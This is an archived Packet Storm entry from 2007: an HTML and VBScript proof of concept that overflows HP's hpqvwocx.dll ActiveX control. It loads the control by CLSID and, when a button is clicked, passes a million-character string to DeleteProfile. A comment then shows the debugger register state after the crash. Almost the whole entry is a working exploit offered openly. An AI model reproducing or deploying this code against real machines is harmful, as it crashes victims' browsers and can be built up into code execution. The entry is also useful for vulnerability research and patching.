hpmagview-dos.txt

2007-05-16T00:00:00
ID PACKETSTORM:56755
Type packetstorm
Reporter callAX
Modified 2007-05-16T00:00:00

Description

                                        
                                            `<html>  
  
<head>  
  
<title>  
  
Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309  
  
</title>  
  
</head>  
  
  
  
<h4>Proof of Concept -> Hewlett Packard Stack Overflow in hpqvwocx.dll v1.0.0.309<br>  
  
Tested in Windows XP Service Pack 2<br>  
  
Discovered by Goodfellas Security Research Team<br>  
  
Url ->http://www.hp.com<br> author -> callAX<br>mail -> callax@shellcode.com.ar<br>  
  
http://www.shellcode.com.ar / http://www.securenetworks.ch</h4>  
  
  
  
<object classid='clsid:BA726BF9-ED2F-461B-9447-CD5C7D66CE8D' id='pAF' ></object>  
  
  
  
<input type="button" value="Boom" language="VBScript" OnClick="OuCh()">  
  
  
  
<script language="VBScript">  
  
  
  
sub OuCh()  
  
  
  
Var_0 = String(1000000, "A")  
  
  
  
pAF.DeleteProfile Var_0  
  
  
  
End Sub  
  
  
  
  
  
</script>  
  
  
  
</html>  
  
  
  
<!--  
  
  
  
Tested in OllyDBG 1.08b  
  
  
  
TEST DWORD PTR DS:[ECX],EAX  
  
  
  
EAX -> 000ED484  
  
ECX -> 000425F4  
  
EDX -> 00000000  
  
EBX -> 00000000  
  
EIP -> 04B47B97  
  
  
  
Sub DeleteProfile (  
  
ByVal Name As String  
  
)  
  
  
  
-->  
`